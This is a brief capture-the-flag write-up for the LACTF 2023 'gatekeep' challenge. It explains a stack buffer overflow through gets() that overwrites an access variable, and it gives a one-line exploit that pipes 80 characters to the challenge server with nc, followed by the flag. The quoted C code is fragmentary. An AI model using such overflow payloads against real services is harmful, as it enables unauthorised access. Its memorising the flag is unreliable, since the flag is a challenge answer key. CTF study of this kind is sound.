
### **Title:** pwn/gatekeep

**Hint:** Straight forward buffer overflow

int check(){
char input[15];
char pass[10];
int access = 0;
if(strcmp(input, pass)) {
printf("I swore that was the right password ...\n");
For this piece of code we can see that after `input`, `pass` and `access` were initialized and `gets()` is used to get the `input`.\
If we overflow `input` we can overwrite `pass` and `access` to pass the `if(access)` to get our flag.

**Exploit:** `python3 -c 'print(80*"a")' | nc lac.tf 31121`

**Flag:** `lactf{sCr3am1nG_cRy1Ng_tHr0w1ng_uP}`

Original writeup (https://github.com/kalyancheerla/writeups/tree/main/2023/lactf/gatekeep).